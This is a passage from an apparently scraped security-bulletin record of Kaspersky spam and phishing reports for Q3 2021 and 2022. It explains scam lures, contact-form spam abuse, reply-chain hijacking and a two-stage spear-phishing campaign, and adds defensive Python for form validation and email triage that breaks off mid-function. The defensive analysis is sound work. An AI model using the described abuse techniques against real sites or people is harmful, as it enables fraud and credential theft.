Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. 
We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. 
Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links 
were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered access to the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users the chance to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget.
Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost over. A vast selection of available seats should have alarmed visitors: real tickets would have been largely gone by then.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait.
For example, one website offered to issue a COVID vaccination certificate to users who entered their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)

Scammers also abused legitimate survey services, creating polls in the name of various organizations to harvest victims' personal data, including sensitive data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which works to improve quality of life and healthcare in poorer regions. Visitors were invited to fill out a form to become eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" had found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, and to attach a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme most likely aimed at identity theft: the illegal use of others' personal details for profit. The cybercrooks might also use the data to contact their victims later and stage a more convincing swindle.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)

### Crypto phishing and crypto scams

The unabated popularity of cryptocurrency kept crypto scammers interested in wallet owners' accounts, even though exchange rates continued to drop throughout the year. Cybercriminals chased seed phrases, the recovery phrases used to restore access to virtual funds.
By obtaining a user's seed phrase, cybercriminals gain full access to their cryptocurrency balance.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)

In typical internet hoax fashion, crypto scam sites offered visitors a way to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payment in cryptocurrency, the very thing they promised to give away and were actually trying to steal. The "giveaways" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. For example, one of the fake sites promised prizes on the occasion of Nvidia's thirtieth anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promoting cryptocurrency adoption was another pretext for the "giveaways". Users were invited to deposit up to 100 units of a cryptocurrency against a promise to receive twice that amount back, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax does: the self-professed altruists went off the radar once they received the deposit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)

### Compensation, bonus, and paid survey scams

Bonuses and compensation are hard to turn down in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.

"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were offered a one-time payment, or payment for taking a service quality survey. Unlike the prizes offered in the crypto schemes above, the promised sums were modest: the equivalent of $30–40.
The cybercriminals used an array of techniques to lull the victims' vigilance: company logos, assurances that the campaigns were legitimate, and detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example, the Polish finance ministry.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)

Aid distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, while those observing the fast buy more than they normally do and may run short of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure that their name was on the list of recipients so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts, nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them.
In addition to that, they might ask the victim to cover the "shipping costs".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)

Growing utility rates and rising prices of natural resources prompted several governments to start discussing compensation for the population. Payout notices could arrive by mail, email, or text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash to cover utility payments or compensation for utility expenses. Visitors were sometimes asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did offer that type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and to enter the details of the bank card linked to their account with the utility. The promise of £400 was supposed to make the victim drop their guard and share their personal information.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)

In Singapore, scammers offered a refund of water supply costs, purportedly because of double billing.
An energy or resource crisis was not used as a pretext in this particular case, but the refunds were still offered in the name of the water supply authority.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)

### Fake online stores and large vendor phishing

We see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted the customers of both globally known retailers and regional players. An attack often started with the victim receiving a link, by email, in an instant messaging app, or on a social network, to a certain product supposedly offered at an attractive price. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)

"Inside information" about "private sales" was also used as a lure. For instance, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible; the only potential red flags were the implausibly low prices and a URL in the address bar that did not match the official one.

Many large vendors, notably in the home appliance segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing.
The risk associated with making a purchase was losing a substantial amount of money and never receiving what was ordered.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)

### Hijacking of social media accounts

Users of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check who has been following them, but without the other party knowing. Cybercriminals after their account credentials offered victims a way to have their cake and eat it too, by means of some supposedly new social media feature. A fake Facebook Messenger page promised an update that could change the user's appearance and voice during video calls and track who had been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)

Many Instagram users dream of the Blue Badge, which denotes a verified account and is typically reserved for large companies or media personalities. Cybercriminals took advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was enter their account login and password.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)

Russia blocked access to both Facebook and Instagram in March 2022, which made the popularity of Russian social networks and Telegram skyrocket. The increased usage also raised the users' risk of losing personal data. "Well-wishers" operating scam sites offered to check whether Russian social media contained any embarrassing material on the victim.
The scam operators told users that damaging information could be found on every third user of a social network by running a search. If the user agreed to have a search done for them, they were told that a certain amount of dirty laundry had indeed been found. In reality, there was no search: the scammers simply stole the credentials they requested for the "check".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)

One of the added risks of social media phishing is that scammers gain access both to the social media account itself and to any linked services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)

The Telegram Premium status provides a range of benefits, from an ad-free experience to the ability to block incoming voice messages, but the subscription costs money. Scammers offered to let victims "test" a Premium subscription free of charge, or simply promised to give one away for free, if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)

One more phishing campaign targeting Telegram users was timed to coincide with the New Year's celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children's drawings and encouraged users to vote for their favorites. The scammers sent links to that page from hacked accounts, asking users to vote for their friends' kids' work. Those who took the bait were directed to a fake page with a login form on it.
The cybercriminals were betting on users going straight to the vote without checking the authenticity of the drawings, which had been copied from competition pages of past years, since requests to vote for friends' kids are common before public holidays.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)

The Telegram auction platform Fragment went live in October 2022, selling unique usernames. Users sign in by linking their Telegram account or TON wallet. Scammers after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was asked to log in, and if the victim entered their credentials, the scam operators immediately grabbed them.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)

## Spam in 2022

### The pandemic

Unlike phishing, COVID-themed spam is still a thing. Most of it is "Nigerian-type" scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts and to improving the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery in which one can win a million euros even without being a Facebook user. Recipients are told that they can claim IMF money left unallocated because of the pandemic.
Others are offered hefty sums under an anti-recession assistance program.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)

The amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year we were blocking a million such emails per month, but by year end the figure had shrunk to a third of that.

### Contact form spam

The year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites with registration, contact, or support request forms that do not require the user to be logged in to submit and do not validate the data entered. In some cases they insert a scam message with a hyperlink into the login or name field; in others they add a longer text with images to the message field. Then the attackers enter the victims' email addresses in the contact fields and submit. On receiving a message via a registration or contact form, most websites send the user's email address an automated reply saying that the request has been received and is being processed, that the account has been created, and so on. As a result, the victim gets an automated reply from an official address of a legitimate organization that contains unsolicited advertising or a scam link. Because the message really is sent by the organization's own mail servers, it passes the sender-authentication and reputation checks that would have stopped the same text coming from the scammers' own infrastructure.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)

Most scam messages offer the recipient compensation or a prize. For example, a spam email targeting Russian users promised the equivalent of $190–4200 in VAT refunds. To get the money, the victim was told to open the link in the message. This scheme is a classic: the linked web page asks the user to pay a commission of under a dozen dollars, which is insignificant compared to the promised refund.
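The handler-side view of the contact form abuse described above, as an added example that is not code from the report or from any affected site: a vulnerable acknowledgement builder that reflects the submitted "name" and "message" into an auto-reply addressed to whatever email was entered, beside a hardened version that rejects link-bearing or non-name input and sends a fixed text. The two form submissions, field names and regular expressions are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed form submissions for the example (not data from the report). The second one
# reproduces the abuse pattern described above: the scam pitch with a link sits in the
# "name" field and the *victim's* address is entered as the submitter's email.
LEGIT = {"name": "Anna Lind", "email": "anna@example.org", "message": "Question about invoice 4471."}
ABUSIVE = {
    "name": "You are owed a $4,200 VAT refund! Claim now: http://refund-vat.example",
    "email": "victim@example.com",
    "message": "",
}


@dataclass
class Ack:
    """The automated acknowledgement the site mails back to the submitter."""
    to: str
    subject: str
    body: str


def build_ack_vulnerable(form: Dict[str, str]) -> Ack:
    """The pattern that makes contact-form spam work: the handler reflects whatever the
    submitter typed into the auto-reply and mails it, from the site's own domain, to
    whatever address was entered. The scam text and link ride along in 'name'."""
    return Ack(
        to=form["email"],
        subject=f"Thanks, {form['name']}, we received your request",
        body=f"Hello {form['name']},\n\nWe received your message:\n{form['message']}\n",
    )


# Anything that looks like a link or a bare domain.
URL_RE = re.compile(r"https?://|www\.|\b[\w-]+\.(?:com|net|org|ru|info|xyz|top|example)\b", re.I)
# A personal name: a letter, then letters, spaces, apostrophes, dots or hyphens, max 64 chars.
NAME_RE = re.compile(r"^[^\W\d_][\w' .-]{0,63}$")


def validate_contact_form(form: Dict[str, str]) -> List[str]:
    """Return the reasons to reject a submission; an empty list means accept."""
    reasons = []
    name = form.get("name", "")
    message = form.get("message", "")
    if not NAME_RE.match(name):
        reasons.append("name field has characters or length atypical for a personal name")
    if URL_RE.search(name):
        reasons.append("name field contains a URL or domain")
    if URL_RE.search(message) and len(message) < 200:
        reasons.append("message is little more than a link")
    return reasons


def build_ack_hardened(form: Dict[str, str]) -> Optional[Ack]:
    """Reject abusive submissions and never reflect free text into the auto-reply, so the
    site's mail servers cannot be used to deliver someone else's message."""
    if validate_contact_form(form):
        return None  # a real handler would also log this and rate-limit the client
    return Ack(
        to=form["email"],
        subject="We received your request",
        body=("Hello,\n\nThank you for contacting us. Your request has been logged and a member "
              "of our team will reply from this address.\n"),
    )
```

The input checks alone are not enough on their own, since scammers adapt their text; the decisive change is that the hardened reply contains nothing the submitter typed, so even a submission that slips past validation cannot carry a pitch or a link to the address in the email field.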
We observed many varieties of contact form money scams, from fuel cards to offers to make money on some online platform.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)

Scammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" populated in fact by bots, where the victims would no doubt be asked to pay for a premium account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)

We blocked upward of a million scam emails sent via legitimate forms in 2022.

### Blackmail in the name of law enforcement agencies

Extortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or received the threats as an image containing text, a format that text-based spam filters cannot read. In addition, the geography of the mailings widened in 2022.

The essence of the message, as in similar emails sent earlier, was that a criminal case was about to be opened against the recipient for allegedly visiting sites containing child pornography.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)

To avoid serious consequences, the attackers urged the victim to respond to the sender as soon as possible and "settle the matter". Most likely, the scammers would then ask in further correspondence for a certain sum to be paid for the victim's name to be removed from the "criminal case".
In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.

### Exploiting the news

Spammers constantly use major world events in their fraudulent schemes, and the 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing money transfers, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand payment to Bitcoin wallets, as the recipient of a cryptocurrency transaction is harder to trace than the recipient of a bank transfer. Blackmail demanding payment in cryptocurrency used to prevail in spam; now attackers have also started collecting Bitcoin for fake charities.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)

The news agenda was also used in other scam mailings. For example, in early July our solutions blocked 300,000 emails in which fraudsters requested help on behalf of a Russian millionaire who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and that the email recipient might be lucky enough to get a piece of the pie.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)

More and more "business offers" are appearing among spam mailings, and they exploit the current news agenda. In the wake of the economic sanctions of 2022, enterprising businessmen offered replacements for goods and services from suppliers who had left the Russian market. For example, spammers actively advertised the services of a company transporting people to Russia.
The email text emphasized that many transport companies had refused to provide such services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)

There were also spam mailings in which various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)

The shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)

Spammers in 2022 also actively marketed their own promotional mailing services as an alternative to advertising on platforms that had become unavailable, such as Instagram. In April alone, for example, we blocked around a million such mailings.

Against the backdrop of sanctions and the accompanying disruption of supply chains, there was an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and their number kept growing, from around 700,000 in the first quarter to more than a million in the fourth.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)

### Spam with malicious attachments

The shift of employees to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted.
Attackers have become more active in imitating business correspondence, targeting not only HR specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and using business language. They also actively exploited the current news agenda and mentioned real employees of the company supposedly sending the emails. Spammers disguised their messages as internal company correspondence, business correspondence between different organizations, and even notifications from government agencies.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)

Disguising malicious emails as business correspondence became a major trend in malicious spam in 2022. Attackers tried to convince the recipient that the email was legitimate, such as a commercial offer, a request for the supply of equipment, or an invoice for goods. For example, throughout the year we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing it from previously infected computers) and sent malicious files or links to all of its participants as a reply to the previous email. Because the malicious message arrives as a reply within a genuine thread, quoting real earlier messages, it is harder for both filters and recipients to spot, and the victim is more likely to fall for it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)

In most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened.
Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot can also harvest the victim's emails, which can then feed further attacks such as the reply-chain scheme described above.

Mailings imitating notifications from various ministries and other government organizations became more frequent in the Runet. The emails were often designed to reflect the specific activities of the organizations they were impersonating. The sender addresses copied the naming logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.

The perpetrators did not ignore the news agenda either. In particular, malware was distributed under the guise of a call-up notice "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".

In the second case, the program installed on the victim's computer was in fact a crypto-ransomware Trojan.

## Two-stage spear phishing using a known phish kit

In 2022, we saw an increase in spear (targeted) phishing attacks against businesses around the world. In addition to typical single-stage campaigns, there were attacks in several stages. In the first email, scammers posing as a potential client asked the victim to provide information about its products and services.
After the victim responds to this email, the attackers start the phishing attack proper.

Key facts:

 * Attackers use fake Dropbox pages created with a well-known phishing kit
 * The campaign targets the sales departments of manufacturers and suppliers of goods and services
 * Attackers send from SMTP IP addresses and _From_ domains belonging to Microsoft Corporation and Google LLC (Gmail)

### Statistics

The campaign began in April 2022, with malicious activity peaking in May, and ended by June.

_Number of emails related to the two-stage targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_

### How a phishing campaign unfolds

Attackers send an email in the name of a real trading company requesting more information about the victim company's products. The email text looks plausible and has no overtly suspicious elements, such as phishing links or attachments. A sender address in a free domain, like gmail.com, may raise doubts. The email in the screenshot below was sent from an address in that domain, and the company name in the _From_ field differs from the name in the signature.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)

**_Example of the first email_**

It is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either [spoof the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are impersonating or register domains similar to the original one. In addition, Google and Microsoft are quick to block email addresses caught sending spam.
This is the most likely reason the attackers used different addresses in the _From_ header (where the email came from) and the _Reply-To_ header (where the reply goes when the recipient clicks "Reply" in their email client). The victim thus responds to a different address, which may be in another free domain, such as outlook.com. The address in the _Reply-To_ header is never used for sending spam, and the correspondence with it is initiated by the victim, so it is far less likely to be blocked quickly.

After the victim responds to the first email, the attackers send a new message asking them to go to a file-sharing site and view a PDF file with a completed order, available via the link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)

**_An email with a phishing link_**

Clicking the link takes the user to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages for stealing credentials to specific services. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)

**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**

In the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button.
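The header-level tells described in this campaign (a company display name on a free-mail _From_ address, a _Reply-To_ in a different domain, a signature that names another company) and the reply-chain hijacking described under "Spam with malicious attachments" (a reply into a genuine thread from an address that never took part in it, carrying a document or archive) can all be checked before a message reaches the sales inbox. The Python triage function below is an added example, not Kaspersky's code or a detection from the report; the two sample messages, the addresses, company names, the thread participant list and the free-mail and risky-extension lists are constructed for the example. The function returns a list of findings so it can be wired into a mail gateway rule or a SOC notebook.

```python
from email import message_from_string, policy
from email.utils import parseaddr
from typing import FrozenSet, List

FREE_MAIL = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com", "mail.ru"}
RISKY_EXT = (".zip", ".rar", ".7z", ".iso", ".img", ".doc", ".docm", ".xls", ".xlsm", ".rtf", ".lnk")

# Constructed messages for the example (not samples from the report). The first imitates the
# opening email of the two-stage campaign: a company display name on a free-mail From
# address, a different company in the signature, and a Reply-To in another free domain.
FIRST_CONTACT = """\
From: "Northwind Trading Ltd" <purchasing.dept.2022@gmail.com>
Reply-To: orders-northwind@outlook.com
To: sales@victim-co.example
Subject: Request for quotation
Message-ID: <a1@gmail.com>
Content-Type: text/plain; charset="utf-8"

Dear Sales Team,
please send details and pricing for your product range.

Kind regards,
John Smith
Contoso Supplies GmbH
"""

# The second imitates reply-chain hijacking: a "reply" into a real thread, sent from an
# address that never took part in it, with an archive attached.
HIJACKED_REPLY = """\
From: accounting@lookalike-partner.example
To: cfo@victim-co.example
Subject: RE: Invoice 2231 - payment schedule
Message-ID: <b2@lookalike-partner.example>
In-Reply-To: <thread-root@partner.example>
References: <thread-root@partner.example>
Content-Type: multipart/mixed; boundary="b"

--b
Content-Type: text/plain; charset="utf-8"

Please see the updated invoice attached and confirm.
--b
Content-Type: application/zip; name="Invoice_2231.zip"
Content-Disposition: attachment; filename="Invoice_2231.zip"
Content-Transfer-Encoding: base64

UEsDBAo=
--b--
"""


def _domain(header_value) -> str:
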